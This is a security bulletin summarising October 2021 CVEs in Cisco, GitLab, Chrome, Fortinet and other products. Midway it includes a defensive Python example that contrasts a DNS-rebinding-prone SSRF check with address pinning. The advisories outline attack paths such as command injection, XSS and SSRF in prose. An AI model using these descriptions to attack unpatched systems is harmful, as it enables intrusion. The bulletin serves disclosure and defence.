Multiple vulnerabilities in the Cisco ATA 190 Series Analog Telephone Adapter Software could allow an attacker to perform a command injection attack resulting in remote code execution or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34735; CISCO

cisco -- business_220_series_smart_switches_firmware
Multiple vulnerabilities in Cisco Business 220 Series Smart Switches firmware could allow an attacker with Administrator privileges to access sensitive login credentials or reconfigure the passwords on the user account. For more information about these vulnerabilities, see the Details section of this advisory.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34744; CISCO

cisco -- business_220_series_smart_switches_firmware
Multiple vulnerabilities in Cisco Business 220 Series Smart Switches firmware could allow an attacker with Administrator privileges to access sensitive login credentials or reconfigure the passwords on the user account. For more information about these vulnerabilities, see the Details section of this advisory.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34757; CISCO

cisco -- dna_center
A vulnerability in the API endpoints for Cisco DNA Center could allow an authenticated, remote attacker to gain access to sensitive information that should be restricted. The attacker must have valid device credentials. This vulnerability is due to improper access controls on API endpoints. An attacker could exploit the vulnerability by sending a specific API request to an affected application. A successful exploit could allow the attacker to obtain sensitive information about other users who are configured with higher privileges on the application.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34782; CISCO

cisco -- identity_services_engine
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to access sensitive information or conduct a server-side request forgery (SSRF) attack through an affected device. This vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by uploading a crafted XML file that contains references to external entities. A successful exploit could allow the attacker to retrieve files from the local system, resulting in the disclosure of sensitive information, or cause the web application to perform arbitrary HTTP requests on behalf of the attacker.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34706; CISCO

cisco -- identity_services_engine
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to obtain sensitive information. This vulnerability is due to improper enforcement of administrator privilege levels for low-value sensitive data. An attacker with read-only administrator access to the web-based management interface could exploit this vulnerability by browsing to the page that contains the sensitive data. A successful exploit could allow the attacker to collect sensitive information regarding the configuration of the system.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34702; CISCO

cisco -- identity_services_engine
A vulnerability in the REST API of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to perform a command injection attack and elevate privileges to root. This vulnerability is due to insufficient input validation for specific API endpoints. An attacker in a man-in-the-middle position could exploit this vulnerability by intercepting and modifying specific internode communications from one ISE persona to another ISE persona. A successful exploit could allow the attacker to run arbitrary commands with root privileges on the underlying operating system. To exploit this vulnerability, the attacker would need to decrypt HTTPS traffic between two ISE personas that are located on separate nodes.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-1594; CISCO

cisco -- intersight_virtual_appliance
A vulnerability in the web-based management interface of Cisco Intersight Virtual Appliance could allow an authenticated, remote attacker to perform a command injection attack on an affected device. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by using the web-based management interface to execute a command using crafted input. A successful exploit could allow the attacker to execute arbitrary commands using root-level privileges on an affected device.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34748; CISCO

cisco -- ip_phone_software
A vulnerability in the debug shell of Cisco IP Phone software could allow an authenticated, local attacker to read any file on the device file system. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by providing crafted input to a debug shell command. A successful exploit could allow the attacker to read any file on the device file system.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34711; CISCO

cisco -- orbital
A vulnerability in the web-based management interface of Cisco Orbital could allow an unauthenticated, remote attacker to redirect users to a malicious webpage. This vulnerability is due to improper validation of URL paths in the web-based management interface. An attacker could exploit this vulnerability by persuading a user to click a crafted URL. A successful exploit could allow the attacker to redirect a user to a malicious website. This vulnerability, known as an open redirect attack, is used in phishing attacks to persuade users to visit malicious sites.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34772; CISCO

cisco -- small_business_220_series_smart_switches
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business 220 Series Smart Switches. An unauthenticated, adjacent attacker could perform the following: execute code on the affected device or cause it to reload unexpectedly; cause LLDP database corruption on the affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Cisco has released firmware updates that address these vulnerabilities.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34779; CISCO

cisco -- small_business_220_series_smart_switches
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business 220 Series Smart Switches. An unauthenticated, adjacent attacker could perform the following: execute code on the affected device or cause it to reload unexpectedly; cause LLDP database corruption on the affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Cisco has released firmware updates that address these vulnerabilities.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34780; CISCO

cisco -- small_business_220_series_smart_switches
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business 220 Series Smart Switches. An unauthenticated, adjacent attacker could perform the following: execute code on the affected device or cause it to reload unexpectedly; cause LLDP database corruption on the affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Cisco has released firmware updates that address these vulnerabilities.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34775; CISCO

cisco -- small_business_220_series_smart_switches
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business 220 Series Smart Switches. An unauthenticated, adjacent attacker could perform the following: execute code on the affected device or cause it to reload unexpectedly; cause LLDP database corruption on the affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Cisco has released firmware updates that address these vulnerabilities.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34776; CISCO

cisco -- small_business_220_series_smart_switches
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business 220 Series Smart Switches. An unauthenticated, adjacent attacker could perform the following: execute code on the affected device or cause it to reload unexpectedly; cause LLDP database corruption on the affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Cisco has released firmware updates that address these vulnerabilities.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34777; CISCO

cisco -- small_business_220_series_smart_switches
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business 220 Series Smart Switches. An unauthenticated, adjacent attacker could perform the following: execute code on the affected device or cause it to reload unexpectedly; cause LLDP database corruption on the affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Cisco has released firmware updates that address these vulnerabilities.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34778; CISCO

cisco -- smart_software_manager_on-prem
A vulnerability in the web UI of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to elevate privileges and create, read, update, or delete records and settings in multiple functions. This vulnerability is due to insufficient authorization of the System User and System Operator role capabilities. An attacker could exploit this vulnerability by directly accessing a web resource. A successful exploit could allow the attacker to create, read, update, or delete records and settings in multiple functions without the necessary permissions on the web UI.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34766; CISCO

cisco -- telepresence_collaboration_endpoint_and_roomos_software
A vulnerability in the memory management of Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an authenticated, local attacker to corrupt a shared memory segment, resulting in a denial of service (DoS) condition. This vulnerability is due to insufficient access controls to a shared memory resource. An attacker could exploit this vulnerability by corrupting a shared memory segment on an affected device. A successful exploit could allow the attacker to cause the device to reload. The device will recover from the corruption upon reboot.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34758; CISCO

cisco -- vision_dynamic_signage_director
A vulnerability in the web-based management interface of Cisco Vision Dynamic Signage Director could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface on an affected device. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34742; CISCO

cobbler -- cobbler
Cobbler before 3.3.0 allows arbitrary file write operations via upload_log_data.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-40324; MISC, MISC

cobbler -- cobbler
Cobbler before 3.3.0 allows authorization bypass for modification of settings.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-40325; MISC, MISC

cobbler -- cobbler
Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-40323; MISC, MISC

concretecms -- concrete5
A Server-Side Request Forgery vulnerability was found in concrete5 < 8.5.5 that allowed a decimal notation encoded IP address to bypass the limitations in place for localhost, allowing interaction with local services. Impact can vary depending on services exposed. CVSSv2.0 AV:A/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N
Published: 2021-10-07 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-22958; MISC, MISC

containerd -- containerd
containerd is an open source container runtime with an emphasis on simplicity, robustness and portability. A bug was found in containerd where container root directories and some plugins had insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as setuid), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files. This vulnerability has been fixed in containerd 1.4.11 and containerd 1.5.7. Users should update to these versions when they are released and may restart containers or update directory permissions to mitigate the vulnerability. Users unable to update should limit access to the host to trusted users. Update directory permission on container bundles directories.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-41103; MISC, CONFIRM

digi -- realport
An issue was discovered in Digi RealPort for Windows through 4.8.488.0. A buffer overflow exists in the handling of ADDP discovery response messages. This could result in arbitrary code execution.
Published: 2021-10-08 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-35977; MISC

digi -- realport
An issue was discovered in Digi RealPort through 4.8.488.0. The 'encrypted' mode is vulnerable to man-in-the-middle attacks and does not perform authentication.
Published: 2021-10-08 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-35979; MISC

digi -- realport
In Digi RealPort through 4.8.488.0, authentication relies on a challenge-response mechanism that gives access to the server password, making the protection ineffective. An attacker may send an unauthenticated request to the server. The server will reply with a weakly-hashed version of the server's access password. The attacker may then crack this hash offline in order to successfully log in to the server.
Published: 2021-10-08 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-36767; MISC

django -- unicorn
The Unicorn framework through 0.35.3 for Django allows XSS via component.name.
Published: 2021-10-07 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-42053; MISC, MISC, MISC

emlog -- emlog
emlog v6.0 contains a vulnerability in the component admin\template.php, which allows attackers to getshell via a crafted Zip file.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2020-21654; MISC

extensible_service_proxy -- extensible_service_proxy
Extensible Service Proxy, a.k.a. ESP, is a proxy which enables API management capabilities for JSON/REST or gRPC API services. ESPv1 can be configured to authenticate a JWT token. Its verified JWT claim is passed to the application by the HTTP header "X-Endpoint-API-UserInfo", which the application can use to do authorization. But if there are two "X-Endpoint-API-UserInfo" headers from the client, ESPv1 only replaces the first one; the second one will be passed to the application. An attacker can send two "X-Endpoint-API-UserInfo" headers, the second one with a fake JWT claim. The application may use the fake JWT claim to do the authorization. This impacts the following ESPv1 usages: 1) Users have configured ESPv1 to do JWT authentication with Google ID Token as described in the referenced google endpoint document. 2) Users' backend application is using the info in the "X-Endpoint-API-UserInfo" header to do the authorization. It has been fixed by v1.58.0. You need to patch it in the following ways: * If your docker image is using tag ":1", you need to re-start the container to pick up the new version. The tag ":1" will automatically point to the latest version. * If your docker image tag pins to a specific minor version, e.g. ":1.57", you need to update it to ":1.58" and re-start the container. There are no workarounds for this issue.
Published: 2021-10-07 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-41130; MISC, MISC, CONFIRM, MISC

f-secure -- antivirus_engine
A vulnerability affecting the F-Secure Antivirus engine was discovered when the engine tries to unpack a zip archive (LZW decompression method), and this can crash the scanning engine. The vulnerability can be exploited remotely by an attacker. A successful attack will result in Denial-of-Service of the Anti-Virus engine.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-33602; MISC

f-secure -- atlant
A Denial-of-Service (DoS) vulnerability was discovered in F-Secure Atlant whereby the AVPACK module component used in certain F-Secure products can crash while scanning fuzzed files. The exploit can be triggered remotely by an attacker. A successful attack will result in Denial-of-Service (DoS) of the Anti-Virus engine.
Published: 2021-10-08 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-33603; MISC, MISC

f-secure -- atlant
A Denial-of-Service (DoS) vulnerability was discovered in F-Secure Atlant whereby the AVRDL unpacking module component used in certain F-Secure products can crash while scanning fuzzed files. The exploit can be triggered remotely by an attacker. A successful attack will result in Denial-of-Service (DoS) of the Anti-Virus engine.
Published: 2021-10-08 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-40832; MISC, MISC

flatpak -- flatpak
Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux. In versions prior to 1.10.4 and 1.12.0, Flatpak apps with direct access to AF_UNIX sockets such as those used by Wayland, Pipewire or pipewire-pulse can trick portals and other host-OS services into treating the Flatpak app as though it was an ordinary, non-sandboxed host-OS process. They can do this by manipulating the VFS using recent mount-related syscalls that are not blocked by Flatpak's denylist seccomp filter, in order to substitute a crafted `/.flatpak-info` or make that file disappear entirely. Flatpak apps that act as clients for AF_UNIX sockets such as those used by Wayland, Pipewire or pipewire-pulse can escalate the privileges that the corresponding services will believe the Flatpak app has. Note that protocols that operate entirely over the D-Bus session bus (user bus), system bus or accessibility bus are not affected by this. This is due to the use of a proxy process `xdg-dbus-proxy`, whose VFS cannot be manipulated by the Flatpak app, when interacting with these buses. Patches exist for versions 1.10.4 and 1.12.0, and as of time of publication, a patch for version 1.8.2 is being planned. There are no workarounds aside from upgrading to a patched version.
Published: 2021-10-08 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-41133; MISC, MISC, MISC, MISC, MISC, MISC, CONFIRM, MISC, MISC

forcepoint -- ngfw_engine
Forcepoint NGFW Engine versions 6.5.11 and earlier, 6.8.6 and earlier, and 6.10.0 are vulnerable to TCP reflected amplification if HTTP User Response has been configured.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-41530; MISC

fortiguard -- fortianalyzer
An improper neutralization of input vulnerability [CWE-79] in FortiAnalyzer versions 6.4.3 and below, 6.2.7 and below and 6.0.10 and below may allow a remote authenticated attacker to perform a stored cross site scripting attack (XSS) via the column settings of Logview in FortiAnalyzer, should the attacker be able to obtain that POST request, via other, hypothetical attacks.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-24021; CONFIRM

fortiguard -- fortianalyzervm_and_fortimanagervm
An information disclosure vulnerability [CWE-200] in FortiAnalyzerVM and FortiManagerVM versions 7.0.0 and 6.4.6 and below may allow an authenticated attacker to read the FortiCloud credentials which were used to activate the trial license in cleartext.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-36170; CONFIRM

fortiguard -- forticlientems
A path traversal vulnerability [CWE-22] in FortiClientEMS versions 6.4.1 and below; 6.2.8 and below may allow an authenticated attacker to inject directory traversal character sequences to add/delete the files of the server via the name parameter of Deployment Packages.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2020-15941; CONFIRM

fortiguard -- forticlientems
An insufficient session expiration vulnerability [CWE-613] in FortiClientEMS versions 6.4.2 and below, 6.2.8 and below may allow an attacker to reuse the unexpired admin user session IDs to gain admin privileges, should the attacker be able to obtain that session ID (via other, hypothetical attacks).
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-24019; CONFIRM

fortiguard -- fortinet_fortisdnconnector
Insufficiently protected credentials in Fortinet FortiSDNConnector version 1.1.7 and below allow an attacker to disclose third-party device credential information via configuration page lookup.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-36178; CONFIRM

fortiguard -- fortiwebmanager
An improper neutralization of input vulnerability [CWE-79] in FortiWebManager versions 6.2.3 and below, 6.0.2 and below may allow a remote authenticated attacker to inject malicious script/tags via the name/description/comments parameter of various sections of the device.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-36175; CONFIRM

gclib -- gffline
An out-of-bounds access in GffLine::GffLine in gff.cpp in GCLib 0.12.7 allows an attacker to cause a segmentation fault or possibly have unspecified other impact via a crafted GFF file.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-42006; MISC

gfos_workforce_management -- gfos_workforce_management
In GFOS Workforce Management 4.8.272.1, the login page of the application is prone to authentication bypass, allowing anyone (who knows a user's credentials except the password) to get access to an account. This occurs because of JSESSIONID mismanagement.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-38618; MISC

gila_cms -- gila_cms
A Stored XSS via Malicious File Upload exists in Gila CMS version 2.2.0. An attacker can use this to steal cookies, passwords or to run arbitrary code on a victim's browser.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-39486; MISC

gila_cms -- gila_cms
Gila CMS 2.2.0 is vulnerable to Insecure Direct Object Reference (IDOR). Thumbnails uploaded by one site owner are visible to another site owner just by knowing the other site name and fuzzing for picture names. This leads to sensitive information disclosure.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-37777; MISC

gitlab -- gitlab
A vulnerability was discovered in GitLab starting with version 12.2 that allows an attacker to cause uncontrolled resource consumption with a specially crafted file.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-39877; MISC, MISC, CONFIRM

gitlab -- gitlab
A stored Reflected Cross-Site Scripting vulnerability in the Jira integration in GitLab version 13.0 up to 14.3.1 allowed an attacker to execute arbitrary javascript code.
Published: 2021-10-05 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-39878; MISC, MISC, CONFIRM

gitlab -- gitlab
Information disclosure from SendEntry in GitLab starting with 10.8 allowed exposure of the full URL of artifacts stored in object-storage with a temporary availability via Rails logs.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-39900; MISC, CONFIRM

gitlab -- gitlab
A business logic error in the project deletion process in GitLab 13.6 and later allows persistent access via project access tokens.
Published: 2021-10-05 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-39866; CONFIRM, MISC, MISC

gitlab -- gitlab_cc/eeIn all versions of GitLab CE/EE since version 11.0, the requirement to enforce 2FA is not honored when using git commands.2021-10-04not yet calculatedCVE-2021-39874
MISC
MISC
CONFIRM
gitlab -- gitlab_ce/eeIn all versions of GitLab CE/EE since version 13.0, an instance that has the setting to disable Bitbucket Server import enabled is bypassed by an attacker making a crafted API call.2021-10-04not yet calculatedCVE-2021-39871
CONFIRM
MISC
MISC
gitlab -- gitlab_ce/eeIn all versions of GitLab CE/EE since version 14.1, an improper access control vulnerability allows users with expired password to still access GitLab through git and API through access tokens acquired before password expiration.2021-10-05not yet calculatedCVE-2021-39872
CONFIRM
MISC
MISC
gitlab -- gitlab_ce/eeIn all versions of GitLab CE/EE, there exists a content spoofing vulnerability which may be leveraged by attackers to trick users into visiting a malicious website by spoofing the content in an error response.2021-10-04not yet calculatedCVE-2021-39873
MISC
MISC
CONFIRM
gitlab -- gitlab_ce/ee
In all versions of GitLab CE/EE since version 8.12, an authenticated low-privileged malicious user may create a project with unlimited repository size by modifying values in a project export.2021-10-04not yet calculatedCVE-2021-39868
MISC
CONFIRM
MISC
gitlab -- gitlab_ce/ee
In all versions of GitLab CE/EE since version 8.9, project exports may expose trigger tokens configured on that project.2021-10-05not yet calculatedCVE-2021-39869
MISC
MISC
CONFIRM
gitlab -- gitlab_ce/ee
In all versions of GitLab CE/EE since version 8.0, a DNS rebinding vulnerability exists in the Fogbugz importer which may be used by attackers to perform Server-Side Request Forgery (SSRF) attacks.2021-10-05not yet calculatedCVE-2021-39894
MISC
CONFIRM
gitlab -- gitlab_ce/ee
 
In all versions of GitLab CE/EE since version 8.0, when an admin uses the impersonate feature twice and stops impersonating, the admin may be logged in as the second user they impersonated, which may lead to repudiation issues.2021-10-04not yet calculatedCVE-2021-39896
CONFIRM
MISC
gitlab -- gitlab_ce/ee
 
In all versions of GitLab CE/EE since version 13.6, it is possible to see pending invitations of any public group or public project by visiting an API endpoint.2021-10-05not yet calculatedCVE-2021-39875
CONFIRM
MISC
MISC
gitlab -- gitlab_ce/ee
 
Missing authentication in all versions of GitLab CE/EE since version 7.11.0 allows an attacker with access to a victim's session to disable two-factor authentication2021-10-04not yet calculatedCVE-2021-39879
CONFIRM
MISC
gitlab -- gitlab_ce/ee
 
In all versions of GitLab CE/EE since version 8.15, a DNS rebinding vulnerability in Gitea Importer may be exploited by an attacker to trigger Server Side Request Forgery (SSRF) attacks.2021-10-05not yet calculatedCVE-2021-39867
CONFIRM
MISC
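The Fogbugz (CVE-2021-39894) and Gitea (CVE-2021-39867) importer entries above describe one pattern: the importer validates a user-supplied URL against the addresses it resolves to, then hands the URL to an HTTP client that resolves the hostname a second time, so a DNS record that flips to an internal address between the two lookups defeats the check. The Python below is an added example written for this bulletin, not GitLab's code. The RebindingResolver class and the two "fetch target" functions are constructed to show the difference without any network traffic; a real client would connect to the pinned address and send the original hostname in the Host header and SNI.

```python
import ipaddress
from urllib.parse import urlsplit


def is_public_address(ip_text):
    """Reject loopback, RFC 1918, link-local (incl. 169.254.169.254), multicast,
    reserved and unspecified addresses; IPv4-mapped IPv6 is unwrapped first."""
    addr = ipaddress.ip_address(ip_text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def pin_target(url, resolver):
    """Resolve the URL's host exactly once, check every returned address, and
    return (ip, port, hostname). The caller must connect to that ip, sending
    Host/SNI = hostname, instead of letting the HTTP library resolve again."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("only absolute http(s) URLs are accepted")
    host = parts.hostname
    port = parts.port or (443 if parts.scheme == "https" else 80)
    try:
        candidates = [str(ipaddress.ip_address(host))]   # IP literal: no DNS
    except ValueError:
        candidates = list(resolver(host))
    if not candidates:
        raise ValueError(f"{host} did not resolve")
    for ip in candidates:
        if not is_public_address(ip):
            raise ValueError(f"{host} resolves to non-public address {ip}")
    return candidates[0], port, host


class RebindingResolver:
    """Constructed attacker-controlled DNS: a public address on the first lookup,
    loopback on every later one (a short-TTL rebinding record). Real code would
    pass a socket.getaddrinfo-based resolver here instead."""

    def __init__(self, first_answer, later_answer):
        self.first_answer = first_answer
        self.later_answer = later_answer
        self.lookups = 0

    def __call__(self, hostname):
        self.lookups += 1
        return [self.first_answer if self.lookups == 1 else self.later_answer]


def vulnerable_fetch_target(url, resolver):
    """Importer pattern that stays exploitable: validate, then hand the URL to
    an HTTP client that resolves the name a second time."""
    pin_target(url, resolver)                    # first lookup: public, check passes
    return resolver(urlsplit(url).hostname)[0]   # second lookup: what is connected to


def safe_fetch_target(url, resolver):
    """Connect to the address that was validated; no second lookup happens."""
    ip, _port, _host = pin_target(url, resolver)
    return ip


if __name__ == "__main__":
    url = "http://import.example/api"
    print("vulnerable connects to:", vulnerable_fetch_target(url, RebindingResolver("93.184.216.34", "127.0.0.1")))
    print("pinned connects to:    ", safe_fetch_target(url, RebindingResolver("93.184.216.34", "127.0.0.1")))
```

Pinning is only half of the fix: redirects returned by the target must go through pin_target again, and the address check has to cover every address the name resolves to, not only the first.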
gitlab -- gitlab_ce/ee
 
In all versions of GitLab CE/EE, provided a user ID, anonymous users can use a few endpoints to retrieve information about any GitLab user.2021-10-05not yet calculatedCVE-2021-39882
MISC
CONFIRM
gitlab -- gitlab_ce/ee
 
In all versions of GitLab CE/EE, an attacker with physical access to a user’s machine may brute force the user’s password via the change password function. There is a rate limit in place, but the attack may still be conducted by stealing the session id from the physical compromise of the account and splitting the attack over several IP addresses and passing in the compromised session value from these various locations.2021-10-04not yet calculatedCVE-2021-39899
CONFIRM
MISC
gitlab -- gitlab_ee
In all versions of GitLab EE since version 13.10, a specific API endpoint may reveal details about a private group and other sensitive info inside issue and merge request templates.2021-10-05not yet calculatedCVE-2021-39888
MISC
CONFIRM
MISC
gitlab -- gitlab_ee
 
A stored XSS in the merge request creation page in GitLab EE version 13.5 and above allows an attacker to execute arbitrary JavaScript code on the victim's behalf via malicious approval rule names.2021-10-04not yet calculatedCVE-2021-39885
MISC
CONFIRM
MISC
gitlab -- gitlab_ee
 
In all versions of GitLab EE since version 8.13, an endpoint discloses names of private groups that have access to a project to low privileged users that are part of that project.2021-10-05not yet calculatedCVE-2021-39884
MISC
CONFIRM
MISC
gitlab -- gitlab_ee
 
Improper authorization checks in GitLab EE > 13.11 allows subgroup members to see epics from all parent subgroups.2021-10-04not yet calculatedCVE-2021-39883
CONFIRM
MISC
google -- chrome
Use after free in Performance Manager in Google Chrome prior to 94.0.4606.54 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37962
MISC
MISC
FEDORA
google -- chrome
Use after free in Tab Strip in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37961
MISC
MISC
FEDORA
google -- chrome
Side-channel information leakage in DevTools in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to bypass site isolation via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37963
MISC
MISC
FEDORA
google -- chrome
Inappropriate implementation in ChromeOS Networking in Google Chrome on ChromeOS prior to 94.0.4606.54 allowed an attacker with a rogue wireless access point to potentially carry out a Wi-Fi impersonation attack via a crafted ONC file.2021-10-08not yet calculatedCVE-2021-37964
MISC
MISC
FEDORA
google -- chrome
Inappropriate implementation in Background Fetch API in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to leak cross-origin data via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37965
MISC
MISC
FEDORA
google -- chrome
Inappropriate implementation in Compositing in Google Chrome on Android prior to 94.0.4606.54 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37966
MISC
MISC
FEDORA
google -- chrome
Inappropriate implementation in Navigation in Google Chrome on Windows prior to 94.0.4606.54 allowed a remote attacker to inject scripts or HTML into a privileged page via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37958
MISC
MISC
FEDORA
google -- chrome
Inappropriate implementation in Background Fetch API in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to leak cross-origin data via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37968
MISC
MISC
FEDORA
google -- chrome
Inappropriate implementation in Google Updater in Google Chrome on Windows prior to 94.0.4606.54 allowed a remote attacker to perform local privilege escalation via a crafted file.2021-10-08not yet calculatedCVE-2021-37969
MISC
MISC
FEDORA
google -- chrome
Use after free in File System API in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37970
MISC
MISC
FEDORA
google -- chrome
Incorrect security UI in Web Browser UI in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37971
MISC
MISC
FEDORA
google -- chrome
Use after free in WebGPU in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37957
MISC
MISC
FEDORA
google -- chrome
Use after free in Task Manager in Google Chrome prior to 94.0.4606.54 allowed an attacker who convinced a user to engage in a series of user gestures to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37959
MISC
MISC
FEDORA
google -- chrome
Inappropriate implementation in Background Fetch API in Google Chrome prior to 94.0.4606.54 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37967
MISC
MISC
